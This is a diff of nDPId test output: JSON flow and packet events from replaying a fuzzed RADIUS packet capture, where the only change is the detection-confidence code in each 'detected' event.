00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1528997683490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997683490,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA\/1AAPsRUM3G4hk1CgysngcUchAAzV+4C2IAxbjeL+gJ\/Z8y3pAVBW+ilI8BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrTG9yZywgNWIyMmE3MTYvZjA6Nzk6NjA6UjE6NyUAMzcvMjI4T0oBAgBIFwEAAAEFAACeTPrzq4G+qMdV63zS5jgKAgUAANMitQR5aAAATi\/4eqBv42KLAQBzCwUAAI3Vpdgp79asxAN0pnzOl99QEuFioroE6q1umxIDXtaj55s="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683835,"flow_last_seen":1528997683835,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997683835,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.119.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1528997683835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997683835,"pkt":"AAAMB6xAABRP+4vqCABFAALHIRVAAP8RAAAKDEAexncZNXIQBxQCswAAAWMCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997687969,"flow_last_seen":1528997687969,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997687969,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1965,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -244,22 +244,22 @@ 01328{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1528997764910,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528997764910,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIRtAACUAAAAKDEAexuIZNXIQBxQClwAAAWkCj2WOGagJIQ3h2c\/0kWBqo7IaCgAAV8gOBFVTGgwAalfIyQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqeEATUwMzExNDgwMDcxMzk0MzA0QHdsYW4ubW5jNDgwLm1jY6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1528997774688,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997774688,"pkt":"ABRP+4rqc9uYVcUnCABFAAClBRNAAPwRTvPG6hk1CgxAHgcUchAAkYpBC3AAiTMAZqtMn01XpTgevOOwYPEBNTCyMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMjExLjNncHBuZXR3b3JrLm9yZy4gNWIyMmE3ODYvZTA6NWY6NDU6OTA6MDk6NWYvMjMwTw4BAAAMFwwAAAwBf\/xQEt5biXJtQqmEfDYtwo6O3Ew="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":205,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997105304,"flow_last_seen":1528997105304,"flow_idle_time":620000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":88,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":205,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997105304,"flow_last_seen":1528997105304,"flow_idle_time":620000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":88,"flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":205,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997109583,"flow_last_seen":1528997109583,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":254,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":205,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997109583,"flow_last_seen":1528997109583,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":254,"flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997775506,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1528997775506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997775506,"pkt":"AAAMB6xAABRP+4rqCABFAALbISRAAP8RAAAKTEAexuIZNXIQBxQCxwAAAXICv9jhsXiK6zCbKgcltxzBMb4aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqePAQIwMzExNDgwMDcxMzk0MzA0QHdsYW4ubW5jRBEwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CHljaXNjb4MGAAAAAR8TYjAtOWYtYmEtNGEtMGUtN2UeJTAwLWE3LTQyL2QwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjECAAAJASthqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997775506,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997775506,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775573,"flow_last_seen":1528997775573,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997775573,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1528997775573,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997775573,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBSFAAPwRTuXG4hk1Cgyqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997775762,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1528997775762,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528997775762,"pkt":"ABRP+4rqcNuYVcUvCABFAADABSVAAPwRTsbG4hk1CgxwHgcUchAArFncA3MApFzr0zNm1cGtfYGqw8gu2esBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMGE3ODQvYjA6OWY6YmE6NGE6MGU6N2UvMjI5EiIzMjc2NCBTdWJzY3JpYmVyIG5rdCBwcm92aXNpb25lZE8HBAEABwBQEol7YUaBxcy8xSb+BSA62Ds="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997775762,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997775762,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01364{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1528997777144,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997777144,"pkt":"AAAMB6xAABRP+4rqCABFAALHISdAAP8RAAAKVCUAxuIZNXIQBxQCswAAAXUCq0+RGyL6qp4kGgBnV02AqO8aCgAAV8gOBFVzGgwAAFfIDQZ3aWZpGg9zAFfICQlXSVNQUjEwGgkAADghDQM3NwZbItKBATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJWwwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmZBMGFjMDAwMDAwYzg4a2E3MjI1YiwgNWIyMmE3OGMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjMxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyZ1AgAkFwEAAAsFAAB4gbzVxbw2lh1ax6mZCkrRAwIAIEu4WjAaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABNyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFBlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghTwYAAOsAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEiPn8\/WrP4cXVwKHtEGPFQc="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":214,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997777328} 00714{"packet_event_id":1,"packet_event_name":"packet","packet_id":214,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997777144,"pkt":"ABRP+4rqcNuYVcUnCABFAAEwBTlWAPwRTkLG4hk1CgxAHgcUchABHFtlAnUBFPy\/77suJLORzOzxdqID6lIaCwAAV8gbBVNQQxpuAAABNxA0sgGX0jUZ0GkvrTEvR6JJSI5kjTryeLE5ZDtRZpqfIB5gVwEzf0GZAiOA3v7qRShWEqoRNMrrQ0Ld9EZkDOPTXqYYz\/U0I\/SC+HAlACKylcNORMjkiI8OEYrbS\/uvrFsRUJm7gb3AATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0dyUAay5vcmcsIDViMjJhNzhjL2aqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":218,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997778442} @@ -272,32 +272,32 @@ 